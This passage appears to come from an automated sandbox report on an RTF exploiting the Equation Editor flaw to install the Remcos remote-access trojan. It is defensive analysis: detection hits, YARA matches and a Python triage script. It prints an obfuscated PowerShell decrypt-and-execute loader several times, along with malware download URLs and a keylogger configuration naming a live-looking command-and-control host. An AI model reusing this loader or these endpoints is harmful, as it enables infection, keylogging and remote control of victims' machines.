TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", ProcessId: 976, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", ProcessId: 976, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS", ProcessId: 976, ProcessName: wscript.exe
Source: Registry Key set; Author: frack113; Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 (the bytes C0 A8 02 16 encode 192.168.2.22, the analysis host's address), EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2404, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3076, TargetFilename: C:\Users\user\AppData\Local\Temp\qr14btjq.eoj.ps1

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3228, TargetFilename: C:\ProgramData\remcos\logs.dat

Network IDS alerts (no Snort rule matched; alerts in chronological order, source port -> destination port):
  • 2024-07-29T16:15:08.856525+0200 | SID 2047750 | TCP 80 -> 49164 | A Network Trojan was detected
  • 2024-07-29T16:15:10.936453+0200 | SID 2049038 | TCP 80 -> 49164 | A Network Trojan was detected
  • 2024-07-29T16:15:12.077338+0200 | SID 2020424 | TCP 80 -> 49165 | Exploit Kit Activity Detected
  • 2024-07-29T16:15:13.845948+0200 | SID 2036594 | TCP 49166 -> 6426 | Malware Command and Control Activity Detected
  • 2024-07-29T16:15:15.887716+0200 | SID 2803304 | TCP 49167 -> 80 | Unknown Traffic
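Taken one at a time, the Sigma hits above and the IDS alerts are noisy signals (an Equation Editor child process, an obfuscated PowerShell command line, a RegAsm.exe started with no arguments); what makes this report unambiguous is that they sit on one process lineage whose last member writes C:\ProgramData\remcos\logs.dat and connects to the host and port in the extracted configuration (the alert to port 6426 above). The Python below is an added example written for this page, not code from the report and not the published Sigma rules: it turns the extracted Remcos configuration into indicators, runs rule predicates modelled on the signatures that fired over a constructed set of Sysmon-style events (same images, PIDs and paths as the Sigma data above, plus one constructed benign event), and walks ParentProcessId from RegAsm.exe back to WINWORD.EXE. The rules match on image basenames rather than full paths because the Sigma data records wscript.exe under C:\Windows\SysWOW64 although the command line names System32: the 32-bit Equation Editor's launch is redirected under WOW64, and a rule keyed on the System32 path would miss it.

```python
"""Host-side triage of the chain in this report.

The events below are constructed for this example and modelled on the Sigma
event data in the report (same images, PIDs and paths); the rules approximate
the signatures that fired and are not the published Sigma rules. The
configuration subset is copied from the report's extracted Remcos configuration.
"""

REMCOS_CONFIG = {
    "Host:Port:Password": "tochisglobal.ddns.net:6426:1",
    "Mutex": "Rmc-9R4HLX",
    "Keylog file": "logs.dat",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
}

WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WSCRIPT = r"C:\Windows\SysWOW64\wscript.exe"   # WOW64 path, as the Sigma data records it
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
VBS = r"C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"

# Constructed Sysmon-style telemetry: EventID 1 process create, 3 network, 11 file create.
# The PowerShell command line is abridged; PID 4100 / parent 1337 is a benign control.
EVENTS = [
    {"EventID": 1, "ProcessId": 2644, "ParentProcessId": 2404, "Image": EQNEDT,
     "ParentImage": WINWORD, "CommandLine": f'"{EQNEDT}" -Embedding'},
    {"EventID": 3, "ProcessId": 2644, "Image": EQNEDT,
     "DestinationIp": "172.245.123.11", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2644, "Image": EQNEDT, "TargetFilename": VBS},
    {"EventID": 1, "ProcessId": 976, "ParentProcessId": 2644, "Image": WSCRIPT,
     "ParentImage": EQNEDT, "CommandLine": f'"C:\\Windows\\System32\\WScript.exe" "{VBS}"'},
    {"EventID": 1, "ProcessId": 3076, "ParentProcessId": 976, "Image": POWERSHELL,
     "ParentImage": WSCRIPT, "CommandLine": "powershell.exe -command (('((e4jfunction "
     "Decrypt-AESEncryption ... -rEplACe ([CHar]67+[CHar]110+[CHar]73),[CHar]34 -cRePLACe "
     "e4jTMIe4j,[CHar]36)') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),"
     "[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"},
    {"EventID": 1, "ProcessId": 3228, "ParentProcessId": 3076, "Image": REGASM,
     "ParentImage": POWERSHELL, "CommandLine": f'"{REGASM}"'},
    {"EventID": 11, "ProcessId": 3228, "Image": REGASM,
     "TargetFilename": r"C:\ProgramData\remcos\logs.dat"},
    {"EventID": 3, "ProcessId": 3228, "Image": REGASM,
     "DestinationHostname": "tochisglobal.ddns.net", "DestinationPort": 6426},
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 1337,
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]


def _name(path: str) -> str:
    """Lower-cased basename: match on it, not the directory (WOW64 redirection)."""
    return path.rsplit("\\", 1)[-1].lower()


def iocs_from_config(cfg: dict) -> dict:
    """Turn the extracted configuration into host and network indicators."""
    host, port, _password = cfg["Host:Port:Password"].rsplit(":", 2)
    run_keys = [hive + r"\Software\Microsoft\Windows\CurrentVersion\Run"
                for hive in ("HKCU", "HKLM") if cfg.get(f"Setup {hive}\\Run") == "Enable"]
    return {"c2_host": host, "c2_port": int(port), "mutex": cfg["Mutex"],
            "keylog_file": cfg["Keylog file"].lower(), "run_keys": run_keys}


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def rules(iocs: dict):
    """(name, predicate) pairs; the names echo the report's signatures."""
    return [
        ("Equation Editor starts process",
         lambda e: e["EventID"] == 1 and _name(e["ParentImage"]) == "eqnedt32.exe"),
        ("Equation Editor network connection",
         lambda e: e["EventID"] == 3 and _name(e["Image"]) == "eqnedt32.exe"),
        ("File dropped by EQNEDT32.EXE",
         lambda e: e["EventID"] == 11 and _name(e["Image"]) == "eqnedt32.exe"),
        ("WScript starts PowerShell",
         lambda e: e["EventID"] == 1 and _name(e["ParentImage"]) in SCRIPT_HOSTS
         and _name(e["Image"]) == "powershell.exe"),
        ("Obfuscated PowerShell command line",
         lambda e: e["EventID"] == 1 and _name(e["Image"]) == "powershell.exe"
         and e["CommandLine"].lower().count("[char]") >= 3
         and "replace" in e["CommandLine"].lower()),
        ("RegAsm.exe started without arguments (injection host)",
         lambda e: e["EventID"] == 1 and _name(e["Image"]) == "regasm.exe"
         and e["CommandLine"].strip().strip('"').lower() == e["Image"].lower()),
        ("Remcos keylog file written",
         lambda e: e["EventID"] == 11 and _name(e["TargetFilename"]) == iocs["keylog_file"]),
        ("Connection to configured C2",
         lambda e: e["EventID"] == 3 and (e.get("DestinationHostname") == iocs["c2_host"]
                                          or e.get("DestinationPort") == iocs["c2_port"])),
    ]


def triage(events, cfg=REMCOS_CONFIG):
    """Every (rule name, ProcessId) pair that fires over the event stream."""
    iocs = iocs_from_config(cfg)
    return [(name, e["ProcessId"]) for e in events for name, pred in rules(iocs) if pred(e)]


def ancestry(events, pid):
    """Basenames from pid up through ParentProcessId; the last entry is the
    ParentImage of the oldest process-create event found (WINWORD.EXE here)."""
    creates = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    chain, last = [], None
    while pid in creates:
        last = creates[pid]
        chain.append(_name(last["Image"]))
        pid = last["ParentProcessId"]
    if last is not None:
        chain.append(_name(last["ParentImage"]))
    return chain


if __name__ == "__main__":
    for name, pid in triage(EVENTS):
        print(f"{pid:>5}  {name}")
    print(" <- ".join(ancestry(EVENTS, 3228)))
```

The C2 rule keys on hostname or port from the configuration; on real telemetry, port 6426 alone is a weak indicator and the hostname (a dynamic-DNS name here, as the "Uses dynamic DNS services" signature notes) or the resolved address should carry the match. The mutex Rmc-9R4HLX and the two Run keys returned by iocs_from_config are the host artifacts to sweep for when the sample's install flag is enabled on another victim; in this analysis the install flag is disabled.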

                AV Detection

                Source: 4vzwJTZbwT.rtf | Avira: detected
                Source: http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIF | Avira URL Cloud: Label: malware
                Source: http://198.46.176.133/Upload/vbs.jpeg | Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\Desktop\~WRD0000.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "benchao", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9R4HLX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: 4vzwJTZbwT.rtf | ReversingLabs: Detection: 50%
                Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_00433837
                Source: powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_117c5fa0-9

                Exploits

                Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Static RTF information | Object: 0 Offset: 000040F2h
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 172.245.123.11 Port: 80
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.dr | Stream path '_1783753252/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.dr | Stream path '_1783753289/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004074FD _wcslen,CoGetObject,8_2_004074FD
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
